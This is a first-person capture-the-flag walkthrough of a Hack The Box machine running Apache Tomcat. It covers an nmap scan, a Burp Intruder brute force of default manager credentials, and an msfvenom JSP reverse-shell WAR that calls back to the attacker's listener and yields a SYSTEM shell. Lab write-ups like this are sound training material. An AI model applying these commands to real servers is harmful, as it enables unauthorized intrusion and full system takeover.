I started by first running Nmap against the machine:
┌──(root💀kali)-[/home/kali/Documents/jerry] └─# nmap -p- -oN scan -sC -sV -O 10.10.10.95 Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-21 13:35 EST Stats: 0:01:52 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 57.10% done; ETC: 13:39 (0:01:21 remaining) Nmap scan report for 10.10.10.95 Host is up (0.023s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 (90%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%) No exact OS matches for host (test conditions non-ideal). OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 193.58 seconds
As you can see from the output, only port 8080 is open. I browsed to this port and was greeted with an Apache Tomcat default page.
I did some googling and found THIS page which describes multiple methods to exploit Tomcat. The one I decided to follow was the method which uploads a WAR file through the application manager interface. I clicked the Manager App button on the Tomcat page and an HTTP basic auth window was displayed.
I discovered THIS website which lists some common credentials used on tomcat. I captured the HTTP authentication in BURP and sent it to the intruder tab. The default request I made looked like the following:
GET /host-manager/html HTTP/1.1 Host: 10.10.10.95:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://10.10.10.95:8080/ Upgrade-Insecure-Requests: 1 Authorization: Basic dXNlcnRlc3Q6cGFzc3Rlc3Q=
I created the payload around the base64 encoded string on the last line. This string contains a username:password format. I copied the usernames and password provided on the github page above and pasted them into a txt document in the username:password format. I then imported that text document into the payload options:
I also added a payload processing rule to encode each payload into base64 to match the encoding of the original request. One last thing I had to do was remove the equals symbol from the payload encoding field. Otherwise, an equals in the base64 string will be URL encoded as %3d which will be incorrect in this case.
Once these setting were entered i started the attack:
As you can see in the screenshot it ran through all the payload options and one returned with a 200 HTTP response. When decoding the request from this response we can see that the accepted credentials were tomcat:s3cret.
Now I knew the credentials I opened the browser and logged into the Manager App page: (http://10.10.10.95:8080/manager/html)
From this web interface I had the option to upload a WAR file. I created a WAR reverse shell using msfvenom:
┌──(root💀kali)-[/home/kali/Documents/jerry] └─# msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.14 lport=2600 -f war > shell.war Payload size: 1091 bytes Final size of war file: 1091 bytes
I then started a netcat listener on port 2600:
┌──(root💀kali)-[/usr/share/webshells/asp] └─# nc -nvlp 2600 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::2600 Ncat: Listening on 0.0.0.0:2600
The WAR file was then uploaded using through the application manager page. Once uploaded a new shell entry appeared at the bottom of the applications list.
I clicked the /shell link and checked the netcat listener.
┌──(root💀kali)-[/usr/share/webshells/asp] └─# nc -nvlp 2600 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::2600 Ncat: Listening on 0.0.0.0:2600 Ncat: Connection from 10.10.10.95. Ncat: Connection from 10.10.10.95:49192. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami whoami nt authority\system C:\apache-tomcat-7.0.88>cd /users cd /users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\Users 06/18/2018 10:31 PM <DIR> . 06/18/2018 10:31 PM <DIR> .. 06/18/2018 10:31 PM <DIR> Administrator 08/22/2013 05:39 PM <DIR> Public 0 File(s) 0 bytes 4 Dir(s) 27,537,899,520 bytes free C:\Users>cd Administrator cd Administrator C:\Users\Administrator>cd Desktop cd Desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\Users\Administrator\Desktop 06/19/2018 06:09 AM <DIR> . 06/19/2018 06:09 AM <DIR> .. 06/19/2018 06:09 AM <DIR> flags 0 File(s) 0 bytes 3 Dir(s) 27,537,702,912 bytes free C:\Users\Administrator\Desktop>cd flags cd flags C:\Users\Administrator\Desktop\flags>dir dir Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of C:\Users\Administrator\Desktop\flags 06/19/2018 06:09 AM <DIR> . 06/19/2018 06:09 AM <DIR> .. 06/19/2018 06:11 AM 88 2 for the price of 1.txt 1 File(s) 88 bytes 2 Dir(s) 27,537,637,376 bytes free C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt" type "2 for the price of 1.txt" user.txt [REDACTED] root.txt [REDACTED] C:\Users\Administrator\Desktop\flags>
As you can see from the output above, the reverse shell was successfully captured. As it was a SYSTEM shell I was able to capture both the user and root flags.